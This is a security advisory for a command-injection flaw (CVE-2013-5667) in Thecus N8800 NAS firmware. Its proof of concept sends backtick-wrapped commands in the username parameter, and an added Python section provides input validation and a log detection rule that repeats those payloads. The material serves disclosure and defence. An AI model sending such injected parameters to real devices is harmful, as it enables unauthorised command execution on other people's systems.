CVE-2013-5667 Thecus OS Command Injection

Advisory Information

Title: Thecus NAS Server N8800 Firmware 5.03.01 get_userid OS Command Injection
Date published: August 2013
Ref: CVE-2013-5667, CWE-78

Advisory Summary

A lack of input validation allows an attacker to execute OS commands directly on the operating system.

Vendor

Thecus

Affected Software

NAS Server N8800 Firmware 5.03.01

Description of Issue

The application accepts user input through the get_userid parameter without validating it; the supplied value is incorporated into an OS command that is then executed by the operating system. An attacker can use this flaw to execute arbitrary commands.

PoC

Standard request:

get_userid=1&username=admin

Response:

{"get_userid":"1001","groupname":false,"data":[]}

Command Injection PoC:

1. Write value for user admin to /tmp

get_userid=1&username=admin`echo+admin+>+/tmp/xpto`

2. Display the value written to /tmp/xpto

get_userid=1&username=`cat+/tmp/xpto`

Response:

{"get_userid":"1001","groupname":false,"data":[]}
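As an added example (not part of the advisory or the vendor's firmware), a defender-side Python check for this parameter: an allowlist validation that the server should apply to the username value, and a detection rule that decodes access-log query strings and flags values containing shell metacharacters, run over constructed log lines that carry the PoC payloads above. The /nas/lookup path and the log layout are assumptions, since the advisory does not name the endpoint.

```python
import re
from urllib.parse import parse_qs

# Allowlist for the username parameter: characters a real account name may contain.
# Anything else (backticks, $(...), ;, |, &, redirections) is rejected instead of
# being handed to a shell.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")
# Shell metacharacters that signal a command-injection attempt in a decoded value.
SHELL_META_RE = re.compile(r"[`$;|&<>\n]")
# Client IP and request target in a common-log-format line (hypothetical log layout).
REQUEST_RE = re.compile(r'^(\S+) .*"(?:GET|POST) (\S+)')

def username_is_valid(username: str) -> bool:
    """Server-side check: True only if the username matches the allowlist."""
    return USERNAME_RE.fullmatch(username) is not None

def check_query(query: str) -> dict:
    """Decode a get_userid query string and classify its username value."""
    params = parse_qs(query, keep_blank_values=True)
    username = params.get("username", [""])[0]  # parse_qs turns '+' into a space
    return {
        "username": username,
        "valid": username_is_valid(username),
        "suspicious": SHELL_META_RE.search(username) is not None,
    }

# Constructed access-log lines (not from a real device); /nas/lookup is a placeholder
# path because the advisory does not name the endpoint. Two lines carry the PoC payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Aug/2013:10:01:02 +0000] "GET /nas/lookup?get_userid=1&username=admin HTTP/1.1" 200 45',
    '10.0.0.9 - - [12/Aug/2013:10:01:09 +0000] "GET /nas/lookup?get_userid=1&username=admin`echo+admin+>+/tmp/xpto` HTTP/1.1" 200 45',
    '10.0.0.9 - - [12/Aug/2013:10:01:15 +0000] "GET /nas/lookup?get_userid=1&username=`cat+/tmp/xpto` HTTP/1.1" 200 45',
    '10.0.0.7 - - [12/Aug/2013:10:02:30 +0000] "GET /nas/lookup?get_userid=1&username=backup.user HTTP/1.1" 200 45',
]

def flag_injection_attempts(log_lines):
    """Detection rule: return (client_ip, decoded_username) for each request
    whose username value contains shell metacharacters."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m or "?" not in m.group(2):
            continue
        result = check_query(m.group(2).split("?", 1)[1])
        if result["suspicious"]:
            hits.append((m.group(1), result["username"]))
    return hits
```

The same allowlist applied before the value ever reaches a shell (or, better, avoiding the shell entirely and calling the lookup with an argument list) closes the flaw; the log rule only surfaces attempts after the fact.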